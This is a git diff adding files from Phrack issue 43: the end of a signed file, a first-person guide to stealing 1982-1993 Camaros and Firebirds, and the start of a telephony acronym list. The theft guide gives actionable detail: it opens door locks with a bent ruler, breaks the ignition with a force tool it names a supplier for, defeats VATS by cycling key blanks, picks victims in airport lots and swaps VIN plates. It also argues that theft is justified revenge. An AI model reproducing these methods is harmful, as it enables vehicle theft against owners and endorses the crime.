+Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
+Y6Zv0kk/7rs=
+=simY
+-----END PGP SIGNATURE-----
+
+[Editor:  We suggest that everyone go ahead and get the info file from
+          soda.berkeley.edu's ftp site.  While you are there,
+          take a look around.  Lots of groovy free stuff.]
+ 
diff --git a/phrack43/20.txt b/phrack43/20.txt
new file mode 100644
index 0000000..67d7e7d
--- /dev/null
+++ b/phrack43/20.txt
@@ -0,0 +1,392 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 20 of 27
+
+[** NOTE:  The following file is presented for informational purposes
+           only.  Phrack Magazine takes no responsibility for anyone
+           attempting the actions described within. **]
+
+-----------------------------------------------------------------------------
+
+                            The Step-by-Step Guide
+                                     to
+                              Stealing a Camaro
+
+                                     by
+
+                                  Spy  Ace
+
+                         spyace@mindvox.phantom.com
+
+
+
+
+PURPOSE:  To describe step-by-step, with specificity, exactly how
+the average person might accomplish with skill and alacrity, the
+theft of a motor vehicle, particularly 1982-1993 Chevrolet Camaros,
+Pontiac Firebirds and similar beasts.
+
+MOTIVE:  While I am a telecommunications enthusiast, I am also a
+basically honest, law-abiding working man. In 1989 an individual
+driving a borrowed automobile struck my only means of transportation,
+a 1986 Chevrolet Camaro, totalling it. My vehicle was parked and
+unoccupied at the time. In an amazing feat of legal maneuvering,
+and after protracted judicial proceedings, all parties involved
+managed to escape liability and I was left without a car or
+reimbursement. The insurance companies are lying, cheating scum.
+As a result, I took matters into my own hands and stole a
+replacement car. I came to the conclusion that the justice system
+in this country exists only to protect the strong from the weak,
+the haves from the have-nots and the rich from the not rich. It
+has nothing to do with rectifying wrongs. It is therefore incumbent
+upon all aggrieved parties to seek personal satisfaction when the
+American legal system fails to provide it. My motive is thus
+twofold:
+
+1.  To see the evil insurance companies screwed some more by
+    sharing my knowledge of car-thieving techniques with those
+    who might apply them.
+
+2.  To assist the little man in obtaining justice when he/she may
+    by confronted with a situation similar to mine.
+
+
+BACKGROUND:  Before I stole my car, I conducted extensive research
+             and talked to a number of individuals in the automotive
+             repossession field, law-enforcement, and several auto
+             mechanics. I assure the reader that everything
+             contained in this file is true to the best of my
+             knowledge and that I HAVE ACTUALLY DONE WHAT I AM
+             WRITING ABOUT. I am not writing hypothetically; I
+             speak from experience. I urge the reader, if he is
+             serious about stealing a vehicle, to verify my
+             research and find out much of this information for
+             himself. Auto shops at local high schools/community
+             colleges are excellent places to experiment and
+             learn, and auto repossession specialists are invaluable
+             sources of information.
+
+
+------
+
+  So, you've decided to steal a car. How nice. In this article I
+will be covering in detail exactly how I stole a 1988 Chevrolet
+Camaro to replace the 1986 of mine that was destroyed by an
+irresponsible driver. The techniques described herein will work on
+1982 thru 1993 Chevy Camaros/Z28s/IROCs/Berlinettas and probably
+the same years Pontiac Firebirds and Trans Ams. With regard to
+the Pontiacs I cannot say for certain because I only experimented
+on Camaro variety cars since that is what I was after. The Pontiacs
+are very similar, however, and I believe this information to be
+applicable to them.
+
+  There are basically only two stages to obtaining possession of a
+vehicle. First, one must gain actual physical access to the inside
+of the car and second, one must disable the steering-lock mechanism
+and activate the ignition. Once these two things have been
+accomplished, the vehicle is yours, subject to the infuriated
+efforts of the owner to regain it. It should be noted, of course,
+that there may be complications associated with either of these
+steps, such as alarm systems or the factory anti-theft mechanisms.
+I will deal with both of these in turn.
+
+  First, gaining entrance to the vehicle. This will require one
+tool: a 24-inch aluminum "shop" ruler. I tried several and settled
+on the Pickett brand ACF-24, available in most art/blueprint supply
+stores. It consists of a 1.25x24x1/16 inch piece of aluminum. For
+maximum efficiency, it should have two slight bends to it. First,
+at 14 inches, bend it subtly to about 15 degrees. Then, at 19
+inches on the ruler, bend it back so that the two sections are
+parallel. Like this:
+                                                        N
+                  _________________                   W + E
+                                   \_______             S
+
+  Of course, the angle in this diagram is far too steep. Both angles
+should only be about 15 degrees. Hopefully, you get the idea. If
+not, you probably shouldn't be thinking about stealing a car. In
+any case, if you have succeeded in fashioning this, you are now
+armed with the only tool necessary to gain keyless entry into your
+soon-to-be new Camaro. The application of this tool is simple.
+Walk up to a Chevrolet Camaro of a year described above, position
+yourself at either door. FIRST: Check to see if the door is
+unlocked. You'd be surprised. If it isn't, you will need to insert
+the tool straight down, in between the rubber weather-stripping and
+the glass, approximately 4-5 inches from the back of the door,
+directly in line with the door-lock. Insert the tool such that the
+small section (see above diagram) is thrust down into the door (did
+I mention that stealing a car is very sexual? Never mind...). The
+small section of the tool should be bent TOWARDS you as you stand
+at the car. In the above diagram, north is towards the car, west is
+straight up in the air, east is straight down towards the inside of
+the door, and south is towards you as you stand at the car. Got the
+picture? If not, get a friend to explain it to you.
+
+  The tool should go in about 16 inches until it catches the lock
+mechanism. If it goes in further than about 17 inches, withdraw and
+try again. Drive straight down, don't force, try moving your
+position an inch to the right or left. Eventually you will feel
+the lock mechanism. It will be rigid but a little spongy (epitome
+of GM engineering). Press down hard on the tool and let up. Try
+the door handle. Does it open? It probably will. If not, drive a
+little harder and keep trying the door. It will give eventually.
+
+WHY THIS WORKS:  Well, this works for two reasons. First of all,
+General Motors is run by a bunch of cheap bastards and their
+cars are designed by engineers who couldn't find their asses with
+both hands. Basically, it's a shitty lock mechanism. It was
+designed shitty and the clods who sell us the piece-of-shit cars
+couldn't care less if they get stolen so they've never bothered to
+redesign the damn thing.
+
+  In order to understand exactly why it works, the curious reader
+would be well advised to go to his local library and look in a
+Clymer or Chilton automotive repair manual for 1986 (or thereabouts)
+Camaro.  In Chapter 12 of the Chilton, under "Body" (page
+290 of mine) there is a magnificently concise exploded diagram of
+"Outside door lock assembly" which contains all the relevant
+information. The lock cylinder itself is connected to some linkage
+which activates the locking/unlocking mechanism. After a few
+months of normal use, this linkage develops some "slop" in it due
+to slight wear of the locking cylinder attachment. By pressing
+down on the linkage down inside the door, you are activating the
+(un)locking mechanism directly and there is enough play in the
+locking cylinder to allow it to give. Take a look at the diagram
+and you'll understand completely.
+
+  Once I understood the locking mechanism, the deficiencies
+therein, and formulated an approach to overcoming it, I
+practiced on a friend's Camaro about a hundred times. If done
+properly and carefully, this will in no way harm any part of
+the car or locking mechanism. Try it on the driver's side
+first; this is usually the easiest because it has the most wear
+in the linkage. Then graduate to the passenger side door. Then
+try it out about a hundred times, then with your eyes closed,
+then while drunk, then with one hand tied behind your back. In
+a day or two you'll be able to get into a Camaro in less than
+ten seconds.
+
+  A note about alarms: some clever individuals, in an effort to
+keep their prized vehicles from being stolen by the likes of you,
+have equipped them with a motion sensor or other devious device
+which tends to emit a shrill series of tones when aggravated. I
+suggest that before trying to open someone else's car, you first
+give it a good rocking back and forth in order to set off any
+alarm which might be present. Since it is not illegal (though it
+may be physically dangerous) to rock someone's car, it's always
+best to try this before actually breaking in. If the alarm
+screams, go on to some other victim. Personally, I have
+encountered very few alarms; the "it won't happen to me" attitude
+is still prevalent.
+
+  Once you've gained physical entry into the vehicle, you are
+now ready for Step Two, ignition lock bypass. Unfortunately, this
+is a difficult step. I did a tremendous amount of research to
+determine the best way to deal with this problem and have
+developed an approach. It is by no means the only way to breach
+the ignition locking mechanism, but in my opinion it is the
+best. In developing this method I was most interested in several
+goals. First of all, I wanted an elegant solution; that is,
+something simple. Minimum tools and work required, and something
+that worked ALL THE TIME, not 50%. Second, I wanted an approach
+that could be accomplished quickly (for obvious reasons) and with
+minimum damage to the vehicle. Ideally, I wanted an attack which
+would not even be immediately obvious to someone (such as a cop)
+glancing in my car at a stoplight. Spending 30 minutes tearing
+apart the steering column might allow you to get the car started,
+but it won't meet the above criteria: speed, elegance, reliability,
+invisibility.
+
+  The problem is that to do this requires a special tool and to
+get this tool one must either send away for it or have access to
+a machine shop to fabricate one. Neither of these is quick and
+easy, but the preparation is well worth it. Here's the basic
+idea. The General Motors vehicle uses an ignition locking
+mechanism called a "sidebar." This is basically one nasty piece
+of hardened fucking steel which blocks the lock cylinder from
+rotating when a properly-fitting key is not in place. It makes
+it impossible to simply "shear off the pins" by brute-force
+turning with a screwdriver or similar device. The solution is to
+use a tool capable of cracking the lock cylinder housing in which
+the sidebar sits. The cylinder housing itself is cast aluminum,
+which is considerably weaker than the sidebar itself, so when the
+proper force is applied it will be the housing which gives, not
+the sidebar. But no matter.
+
+  First, get access to a Camaro, or for this exercise, just about
+any GM automobile since 1978 (the year they got the bright idea
+to put a locking screw in to keep people from just ripping the
+whole ignition lockset right out -- but that's a whole different
+story...). My favorite place to experiment on cars without being
+observed (and in fact legally) is to go to a local self-serve
+auto-wrecking "You Pull It" yard. They have these in many cities
+around the fruited plains; you pay a buck or two to get in and then
+go pluck parts from rotting American classics. If you don't drag
+any parts out, you can basically tear apart all the cars you want
+for a buck. If you don't have a You-Pluck-It nearby or are
+philosophically opposed to vehicular cannibalism, then use the
+method previously described to break into someone's Camaro for this.
+
+  Once you have access to a GM (preferably a Camaro), get a
+screwdriver out and pry the outer ring off of the ignition set.
+The ring I'm talking about is the thing with the two tabs on it
+for your fingers to turn when you rotate the ignition to start
+the car. Just pry that sucker off of there -- it comes off very
+easily as it is affixed by two small gripping tabs. I can usually
+remove it by hand, but it's easiest to simply pry gently with a
+screwdriver. After you have pried that off of the ignition set,
+take a look. You'll see the ignition cylinder (with the keyway),
+the outer housing, and the actual ignition activation mechanism,
+which has two slots in it (where the outer ring fit into before
+you pried it off). This ignition linkage, with the two tabs, is
+what turns when a fitting key is inserted into the keyway and then
+turned. Note that in a GM ignition set, a fitting key serves only
+to withdraw the sidebar to allow the outer ignition mechanism to
+turn.
+
+  The problem is to overcome the sidebar which prevents the
+ignition from turning. Fortunately, there is a tool for this very
+purpose. It is manufactured by Briggs and Stratton (yes, the lawn
+mower engine people) who happen to also make the locksets for GM.
+They make the locks. They make the tool to break the locks. You
+figure it out. Anyway, this neat little device is called a "GM
+Force Tool". I got mine from LDM Enterprises in Van Nuys, California
+(where else?) and it ran me about $90. Their fone number is
+800-451-5950 and you should probably tell them that you're in the
+automotive repossession business if you go to order one of these.
+If they won't sell you one (because someone at GM read this
+article and hopped up and down) then simply go down to a local
+repo man and pay him an extra $25 to order one for you. Most of
+those guys are pretty sleazy and will do just about anything for
+a buck. If you have access to a machine shop and are reasonably
+competent, go ahead and make one.
+
+  I will attempt a description. Don't feel stupid if you don't
+get this; it's difficult to describe it in text. Drop me E-mail
+and I'll send you a .GIF of the fucking thing. Anyway, it looks
+basically like a socket with very thin walls and two small tabs
+which fit into where the thumb-ring-thing used to go. You tap it
+onto the ignition set, into the two slots and the outside walls
+of the tool fit very snugly around the outside of the locking
+mechanism to keep it from splitting apart as you turn it. On the
+other end of the tool is a 1/2 inch square hole for a ratchet.
+Got the idea? Tap it onto the ignition, attach a healthy sized
+ratchet and turn slowly but forcefully. After about 30 degrees of
+turn the sidebar will crack the ignition lock housing and the
+whole mechanism will freely turn. If you don't understand this,
+take a look at a GM ignition (sans outer ring) and the facts will
+become readily apparent. If you have access to a machine shop, it
+is a simple matter to make one of these tools. Go to your local
+GM dealer and buy a whole ignition set, snap the outer ring off of
+there and take your measurements. Remember that the inner wall of
+the force tool must fit snugly around the lockset in order to keep
+it from splitting apart. That is why a device with simply two tabs
+which fit into the ignition linkage will not work (I tried it --
+the metal is too soft and tears apart).
+
+  Seem like too much work? Well, of course it is a bit of work,
+but preparation is the key! My father always stressed that the
+most important part of doing a job is having the right tools. The
+tools in this case are KNOWLEDGE of how all these goofy parts fit
+together and operate, a properly constructed force tool, and the
+patience to apply these two components to bring about the desired
+result. With some practice I was able to circumvent a Camaro
+ignition in just under 30 seconds. It does very little actual
+damage to the vehicle ($11.00 for a new ignition set) and in fact
+the thumb-ring-thing can be jammed back on and a key inserted and
+it will appear that everything is proper (in case you're pulled
+over by the local constable).
+
+
+V.A.T.S.
+--------
+
+  Because of the horrendous problems with car theft, particularly of
+Camaros, GM came up with a neat system boldly dubbed the "Vehicle
+Anti Theft System". Needless to say, as with most security devices,
+VATS accomplished little more than being a nuisance to vehicle owners
+and a minor inconvenience to car thieves. Here's how to defeat it.
+
+  First, basic theory of operation. The ignition of a VATS equipped
+vehicle (most 1988 and newer GMs, particularly the Camaros/Firebirds)
+is the same as the normal GM ignition except that it has an
+electronic sensor built in which requires activation by a resistor
+pack built in to the owner's key. There are fifteen possible resistor
+types, so each different VATS key that you have gives you a 6.7%
+chance of being capable of activating the ignition. The catch is that
+if you feed it the wrong one it will kill the ignition for 4 minutes.
+Thus, if you had a complete set of fifteen VATS keys, it would take
+you a maximum of one hour to run through them all. This is GM's
+idea of security: annoy the thief.
+
+  If you plan to tackle a VATS-equipped car, get a full set of the
+fifteen VATS keys. They're a few bucks each and you can get them
+from a locksmith or LDM. Obtain access to your target car in an
+area and in such circumstances as will allow you to work for an
+hour relatively undisturbed. In practice, this is not very difficult
+(more on that later). Once you have access to the vehicle and are
+satisfied that you can work unobserved, break the ignition lock
+using your force-tool as described above. Insert your first VATS
+key blank and attempt to start the vehicle. If it will not activate
+the ignition, remove the key, wait four minutes and try the next
+one. Eventually you'll hit it. (Median hit time, of course: 30
+minutes). Drive away.
+
+
+Scouting a Victim
+-----------------
+
+  An essential element of stealing a car without getting caught
+is picking out the right one. Again, preparation is the key. Once
+you've mastered the necessary techniques, start looking around for
+a good place to pick up a vehicle. The car thieves that I spoke
+with told me that their preferred places are mall parking lots at
+night: there is a lot of activity so you probably won't be noticed
+lurking around waiting for a good prospect to show up. People
+usually go into the mall for several hours to buy crap, so you have
+time to work. Wait until no one is looking and pounce. Once you are
+inside the vehicle (which, with practice, may be accomplished in
+15 seconds) you are home free. No one is going to pay any attention
+to you screwing around inside the vehicle and you'll be long gone
+by the time the owner finishes charging a new Salad Shooter on his
+American Express. Another good place is airport parking lots. While
+they are often sporadically patrolled, it is in practice a simple
+matter to drive around until you spy the right vehicle, then pack
+all your necessary tools into a suitcase and walk from the terminal
+to the lot like a returning airline passenger. That's how I did it.
+The car was not reported stolen for over two weeks (it was in the
+long-term lot), giving me plenty of breathing room.
+
+  There are numerous other places. Start noting the places that
+you leave your car: supermarket, movie theater, in front of your
+house, at work, in a parking garage, etc. Start noticing patterns.
+That 1988 IROC you see parked in the same place for five hours
+every Tuesday. When you actually commit the deed, BE PREPARED. Do
+a dry run. Be calm, work quickly but carefully. Act like you
+belong where you are -- don't lurk around nervously. Walk right
+up to the car and steal it. If confronted by someone, try to talk
+your way out of it. Don't get violent: it's just a thing. A car
+is not worth hurting someone over. Don't worry about getting
+caught: most cities can't cope with the crime epidemic and do not
+bother to do much about auto theft.
+
+
+What Do I Do With It?
+---------------------
+
+  That's up to you. Take it for a joy ride. If you boosted it from
+an airport lot you can probably safely cruise around in it for a
+week or two. Go pick up bimbos and drive them to Las Vegas. Or
+sell the thing to a chop shop (you're on your own finding them; I
+have no experience with them). Tear it apart yourself and sell the
+parts. Drive it into the lobby of an insurance company building.
+Or go buy a Camaro of the same year and model that has been
+totalled out and switch the VIN plates once you have clear title.
+That's not a particularly difficult affair, although some skill is
+required to remove the VIN tags and install them in your new car.
+Have fun! Stay out of trouble. If you have any questions, E-mail
+me. Above all, keep in mind that two things are essential to steal
+a car without getting caught: PRACTICE and PREPARATION. Good luck!
+
+                          -->Spy Ace<--
+                   spyace@mindvox.phantom.com
\ No newline at end of file
diff --git a/phrack43/21.txt b/phrack43/21.txt
new file mode 100644
index 0000000..f81c1aa
--- /dev/null
+++ b/phrack43/21.txt
@@ -0,0 +1,1143 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 21 of 27
+
+    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    +                                                             +
+    +                                                             +
+    +   The Telephony Acronyms and Abbreviations List from Hell   +
+    +                                                             +
+    +                                                             +
+    +            by                                               +
+    +                      Crisp GRASP                            +
+    +                                                             +
+    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+ Well, here it is, the list from hell. Sure beats the old lists of 100
+or so three letter acronyms. The whole reason for this list is so that
+you  can  crack almost ANY bell document.  This list came from  a  few
+lists  (one in Phrack a while back)  and a few other Telephony  lists
+here and there. Though it must be noted (and i want to take credit for
+it)  that  well over half of the acronyms and abbreviations were typed
+in by me,  inputed into my database (of course I am not about to give
+out my database).
+    It is always a good idea to start a database, one will learn a lot
+faster.   It  is  doing  things scientific like,  and for  someone  as
+compulsive as I,  solving the puzzle of the telephone company was easy
+as pie. I must say that all the hackers I have meet, and talked to are
+all compulsive as hell <G>.  I think it is just what it comes down to,
+who is willing to learn.   Any ways here is two fields in my database,
+one small part,  but worth it.   Though i do not think it will be able
+to  help most of you out,  just gets into too much,  and understanding
+which  acronym goes where,  and understanding what goes where is hard.
+Well good luck!
+
+Greets to Bell Northern Labs, never see too much from you press wise!
+and to SRI, should have come to Cal. hah  (Don knows what I am talking
+about, his funding is short)
+
+--------------------------------------------------------------------------
+
+15M          Fifteen minutes
+15S          Fifteen seconds
+1CF          Singal party coing first pay phone
+1FAC         Interface packs
+1FB          One party flat business rate
+1OF          One party official (telco) business line
+2SPDT        Partial dial timeout in the second stage of a traditional
+              2-stage international
+2SPST        Permanent signal timeout in the second stage of a traditional
+              2-stage international
+2SVCA        Vacant code in the second stage of a traditional 2-stage
+              international outbound
+2W           Two wire (pair) (circuit)
+2WAY         Two-way trunk groups
+300          Log command menu (SARTS command)
+376          Log clear (SARTS command)
+384          Write log (SARTS command)
+385          Read log (SARTS command)
+399          Log print (SARTS command)
+3KHZ         Three kilohertz
+3RNGR        Three ringer
+3WO          Third wire open
+4W           Four wire (pair) (circuit)
+600          Test menu (SARTS command)
+600B         600-ohm briged connection
+611          Detail tests (SARTS command)
+621          Macro command menu (SARTS command)
+631          Automatic test command (SARTS command)
+735T         735-ohm compromise termination
+?A           Action field contains an error
+?D           Data field contains an error
+?E           Error exist in the message but can ot be resolved to the
+              proper field
+?I           Identification field contains an error
+?T           Time-out has occured on channel
+?W           Warning message
+A            A side (lead) (pair)
+A            Area
+A            Telephone number or trunk group and member number from trouble
+A/B          Two wire phone connection (T&R)
+AA           Automatic answer
+AA           Packet analog access line INTER/TRA blocal 1-26
+AABS         Automatic alternate billing service
+AAE          Auxiliary access equipment
+AAR          Automatic alternate routing
+AAX          Automated attendant exchange
+AB           Packet switch trunk INTER/TRA blocal 1-26
+ABATS        Automatic bit access test system
+ABATS        Automatic bit access test system (DDS service)
+ABC          Automatic bill calling (TSPS)
+ABF          Abandon failure
+ABF          Abandon failure (MDII)
+ABHC         Average busy hour calls
+ABL          Auxiliary Buffer oder word Left half
+ABM          Asynchronous balanced mode ( -> SABME)
+ABME         ABM extended
+ABR          Auxiliary Buffer order word Right half
+ABS          Alternate billing service
+ABS          Alternative billing service
+ABSBH        Average busy season busy hour
+ABT          Abort
+ABV          Above
+AC           Administrative computer
+AC           Alternating current
+AC           Assembly code
+ACA          Asynchronous communication adapter
+ACB          Annoyance call bureau
+ACB          Automatic call-back
+ACC          Audio communications controller
+ACCS         Automated calling card service
+ACD          Automatic call distribution
+ACD          Automatic call distributor
+ACDA         Automatic call disposition analyzer
+ACDN         Access Directory Number
+ACDN         Access directory number
+ACE          Assignment change establish
+ACE          Automatic calling equipment
+ACES         Aris cabs entry system
+ACF          Advanced communications functions
+ACFA         Advanced CMOS frame aligner peb2030
+ACG          Automatic call gap
+ACH          Attempt per circuit per hour
+ACI          Answer controller interface (IOM2 monitor command)
+ACIA         Asynchronous communications interface adapter
+ACK          Acknowledge
+ACK          No acknowledgement wink
+ACK          No acknowledgement wink (MDII)
+ACKDB        Acknowledgement database
+ACM          Address complete msg. (SS7: in ISUP)
+ACOF         Attendant control of facilities
+ACP          Action point
+ACSE         Association control service element
+ACSNET       Acedemic computing services network
+ACSR         Automatic customer station rearrangement
+ACSU         Advanced T-1 channel service unit
+ACT          AC Testing definition
+ACT          AC testing definition
+ACT          Activate
+ACT          Active
+ACT          Auto or automatic circuit transactions
+ACTS         Automated coin toll service
+ACTV         Acticated
+ACTVD        Activated
+ACU          Alarm control unit
+ACU          Automatic calling unit
+AD           Attendant INTER/TRA blocal 1-26
+ADAP         Audix data acquisition package
+ADAS         Advanced directory assistance system
+ADC          American digital cellular
+ADC          Analog to digital converter
+ADCCP        Advanced data communication controll procedure
+ADCCP        Advanced data communications control procedure
+ADCI         Automatic display call indicator
+ADD EXP      Address expander
+ADDL         Additional
+ADDR         Address translations
+ADJ          Ajust
+ADM          Add-drop multiplex
+ADMA         Advanced DMA controller SAB82258
+ADN          Abbreviated dialing number
+ADP          Automatic diagnostic process.
+ADPCM        Adaptive PCM
+ADS          Administration of designed services
+ADS          Administration of designed services review
+ADS          Advanced digital system
+ADS          Audio distribution system
+ADS          Auxilary data system
+ADSL         Asymmetrical digital subscriber line
+ADTS         Automated digital terminal system
+ADTS         Automatic data test system
+ADTS         Automatic digital terminal system
+ADU          Automatic dialing unit
+AERM         Alignment error rate monitor
+AF           Commercial audio fulltime INTER/TRA blocal 1-26
+AFACTS       Automatic facilities test system
+AFADS        Automatic force adjustment data system
+AFE          Analog front end
+AFI          Authority and format identifier (ISO 7498)
+AFSC         Advanced features service center
+AFSK         Automatic frequency shift keying
+AG/EEE       Above ground electronic equipment enclosures
+AGC          Automatic gain control
+AGM          Normal aging months
+AGND         Analog ground
+AGT          Accelerated aging type
+AI           Activate indication (C/I channel code)
+AI           Artificial intelligence
+AI           Assigner's initials
+AI           Automatic identified outward dialing INTER/TRA blocal 1-26
+AIC          Automatic intercept center
+AICC         Automatic intercept communications controller
+AIN          Advanced intelligent network
+AIOD         Automatic id of outward dialing
+AIOD         Automatic identifaction of outward dialing
+AIS          Alarm indication signal
+AIS          Alarm indication signals
+AIS          Automatic intercept system
+AIT          Analit initialization of tables
+AIU          AI upstream
+AL           Alternate services INTER/TRA blocal 1-26
+ALATS        Automatic loop access system system (DDS service)
+ALBO         Automatic line buildout
+ALE          Address latch enable
+ALE          Automatic line evaluation
+ALFE         Analog line front end
+ALGOL        Algorhythmic computer language
+ALI          Automatic location indentification
+ALIT         Automatic line insulation testing
+ALL          All events
+ALL          All module controller maintenance interrupts
+ALL          Turns on all IDs
+ALPT         Alarm scan points
+ALRM         Alarms
+ALRU         Automatic line record update
+ALS          Automated list service
+AM           Administrative module
+AM           Amplitude modulation
+AM           Asynchronous multiplexer
+AM           Packet
+AMA          Automatic Message Accounting
+AMA          Automatic message accounting
+AMACS        AMA collection system
+AMAIRR       Automatic message accounting irregularity
+AMALOST      Lost automatic message accounting
+AMARC        AMA recent change
+AMARC        AMA recording center
+AMASE        AMA standard entry
+AMAT         Automatic message accounting transmitter
+AMATPS       Automatic message accounting teleprocessing system
+AMATPS       Automatic message accounting transmitter teleprocessing system
+AMC          Add-on module connector (-> sipb)
+AMERITECH    American information technologies
+AMI          Alternate mark inversion code
+AML          Automatic maintenance limit.
+AMP          Advance measurement processor
+AMP          Amplifier
+AMPS         Advanced mobile phone service
+AMR          Automatic meter reading
+AMWI         Active message waiting indicator
+AN           Announcement service INTER/TRA blocal 1-26
+AN           Associated number
+ANA          Automatic number announcement
+ANC          All number calling
+ANCT         Analysis control table
+ANI          Automatic number identification
+ANIF         Automatic number identification failure
+ANM          Answer msg. (SS7: in ISUP)
+ANS          Answer
+ANS          Answer On Bus
+ANS          Answer msg.
+ANSER        AT&T Network Servicing System (i.e.  via EADAS link )
+ANSI         American national standards institute
+AO           Allocation order
+AO           International/overseas audio (full time) INTER/TRA blocal 1-26
+AOC          Advice of charge (i.256 B)
+AOSS         Auxilliary operator service system
+AP           Access point
+AP           Application (OSI layer 7)
+AP           Application processor
+AP           Attached processor
+AP           Auciliary processor
+AP           Automatic position
+AP           Commercial audio (part time) INTER/TRA blocal 1-26
+AP-PG        Access point page
+APC          Alarm processor circuit
+APC          Amarc protocol converter
+APD          Access point data
+APD          Avalanche photo diode
+APDB         Access point data base
+APDL         Application processor data link
+APH          Application protocol handler
+API          Application interface
+APM          Application processor modules
+APPC         Advanced program to program communication (IBM)
+APPL1-APPL5  Reserved for application handlers
+APS          Automatic position system
+APS          Automatic protection switch
+APS          Automatic protection switching system
+AQ           Autoquote problem.
+AR           Activation request (C/I channel code)
+AR           Alarm report
+AR01         Office alarm - 1AESS alarm message -
+AR02         Alarm retired or transferred - 1AESS alarm message -
+AR03         Fuse blown - 1AESS alarm message -
+AR04         Unknown alarm scan point activated - 1AESS alarm message -
+AR05         Commercial power failure - 1AESS alarm message -
+AR06         Switchroom alarm via alarm grid - 1AESS alarm message -
+AR07         Power plant alarm - 1AESS alarm message -
+AR08         Alarm circuit battery loss - 1AESS alarm message -
+AR09         AMA bus fuse blown - 1AESS alarm message -
+AR10         Alarm configuration has been changed (retired inhibited) - 1AESS
+AR11         Power converter trouble - 1AESS alarm message -
+AR13         Carrier group alarm - 1AESS alarm message -
+AR15         Hourly report on building and power alarms - 1AESS alarm message
+ARA          Automatic reservation adjustment
+ARC          Administrative responsibility code
+ARC          Alternate route cancellation
+ARC          Alternate route cancellation control
+ARC          Audio response controller
+ARCOFI       Audio ringing codec filter
+ARCOFI-SP    ARCOFI + speakerphone function
+ARCOS        ARCOFI coefficient support program
+ARCOTI       SIPB telephone module
+ARD          AR downstream
+ARG          Alarm reference guide
+ARG          Assemble and run a given master file
+ARIS         Audichron recorded information system
+ARL          Activation request local loop (C/I channel code)
+ARM          Activation request maintenance (C/I channel code)
+ARM          Asynchronous response mode
+ARM          Automatic R(emote test system) maintance
+ARMAR        Automatic request for manual assistance resolution
+ARN          Activation request
+ARQ          Automatic repeat request
+ARR          Automatic ring recovery.
+ARS          Alternate route selection
+ARS          Automatic route selection
+ARSB         Automated repair service bureau
+ARSB         Automatic repair service bureau
+ARSSI        Automatic rought selection screening index
+ART          Audible ringing tone
+ARU          Activation request upstream
+ARU          Audio response unit
+ASAP         As soon as possible
+ASC          Alarm and status circuit
+ASC          Alarm and status circuit .
+ASC          Alarm surveillance  and control
+ASCC2        Advanced serial communication controller
+ASCII        American standard code for information interchange
+ASCII        American standard code for information interexchange
+ASD          Automated SMAS diagnostics
+ASDPE        Synchronous data link controller (SDLC) A reset
+ASE          Application service element
+ASEC         Assignment section
+ASGN         Assign
+ASGNMTS      Assignments
+ASIC         Application specific integrated circuit
+ASM          Analog subscriber module
+ASOC         Administrative service oversight center
+ASP          Advanced service platform
+ASP          Arcofi signal processor
+ASPACGCOMP   ASP SCP response message with an ACG component received at the
+              switch
+ASPBADRESP   ASP SCP response message received with invalid data
+ASPEN        Automatic system for performance evaluation of the network
+ASPNORTEMSG  ASP reject message ret err and a play announc recei at the
+              switch from the SCP
+ASPSNCOMP    ASP SCP response message with a send notifi component received
+               at the switch
+ASPTNMSG     ASP termination notification message sent from the switch to
+               the SCP
+ASR          Access service request
+ASSN         Assignment
+AST          Position acknowledge seizure signal time-out (MDII)
+ASYNC        Asynchronous
+AT           Access tandem
+AT           International/overseas audio (part time) INTER/TRA blocal 1-26
+AT&T         American telephone and telegraph
+AT-1         Auto test-1
+AT-2         Auto test-2
+AT01         Results of trunk test - 1AESS automatic trunk test
+ATA          Automatic trunk analysis
+ATAB         Area trunk assignment bureau
+ATAI         Automatic troubler analysis interface
+ATB          All Trunks Busy
+ATB          All trunks busy
+ATC          Automated testing control
+ATC          Automatic transmission control
+ATD          Accept date
+ATD          Async. TDM
+ATH          Abbreviated trouble history
+ATI          Automatic test inhibit
+ATI          Awake TI
+ATICS        Automated toll integrity checking system
+ATIS         Automatic transmitter identification system
+ATM          Analog trunk module
+ATM          Asynchronous transfer mode
+ATM          Automatic teller machine
+ATMS         Automated trunk measurement system
+ATN          Assigner's telephone number
+ATO          Time-out waiting for address complete signal
+ATP          All tests pass
+ATR          Alternate trunk routing
+ATRS         Automated trouble reporting system
+ATTC         Automatic transmission test and control circuit
+ATTCOM       AT&T communications
+ATTG         Attendant group
+ATTIS        AT&T information system
+AU           Access unit
+AU           Autoscript INTER/TRA blocal 1-26
+AU           Auxiliary
+AUD          Assignment list audit
+AUD          Audits
+AUDIT        Audit detected problem.
+AUDIX        Audio information exchange
+AUP          Access unit port
+AUTO         Automaitc
+AUTODIN      Automatic digital network
+AUTOSEVCOM   Automatic secure voice communications
+AUTOVON      Automatic voice network
+AUXF         Auxillary frame
+AVD          Alternate voice data
+AVD          Alternate voice-data
+AWI          Awake indication
+AZD          All zeros data
+B            B side (pair) (lead)
+B            Bridged connection
+B            Equipment number
+B6ZS         Bipolar with 6 zero subsitution
+B8ZS         Bipolar eight zero suppression encoding (DS-1)
+B8ZS         Bipolar with 8 zeros substitution (T1 pri)
+B911         Basic 911
+BA           Basic access
+BA           Protective alarm (CD) INTER/TRA blocal 1-26
+BAF          Blocking acknowledgment failure
+BAI          Bridge lifter assignment inquiry
+BAL          Balance
+BAMAF        Bellcore AMA format
+BANCS        Bell administrative network communications system
+BANKS        Bell adminastration network systems
+BAPCO        Bellsouth advertising & publishing company
+BAS          Basic activity subset
+BAT          Battery (-48v)
+BAx          Business address x (x = number of line)
+BB           Blue box
+BBD0/1       Binary 0s or 1s detected in b and d channels
+BCC          Bellcore client companies
+BCC          Block check character
+BCC          Blocked call cleared
+BCCP         Bearer ccp
+BCD          Binary coded decimal
+BCD          Blocked call delayed
+BCFE         Busy call forwarding extened
+BCID         Business customer identifier
+BCLID        Bulk calling line identification
+BCMS         Basic call management system
+BCS          Batch change supplement (NTI) (DMS-100)
+BDCA         Unk
+BDCS         Broadband digital cross-connect system
+BDS          Basic data service
+BDT          Billing data transmitter
+BEF          Band elimination filter
+BEL          Bell
+BELLCORE     Bell communications research
+BER          Bit error rate
+BERT         Bit error rate test
+BETRS        Basic exchange telecommunications radio service
+BG           Battery and ground signaling
+BG/EEE       Below ground electronic equipment enclosures
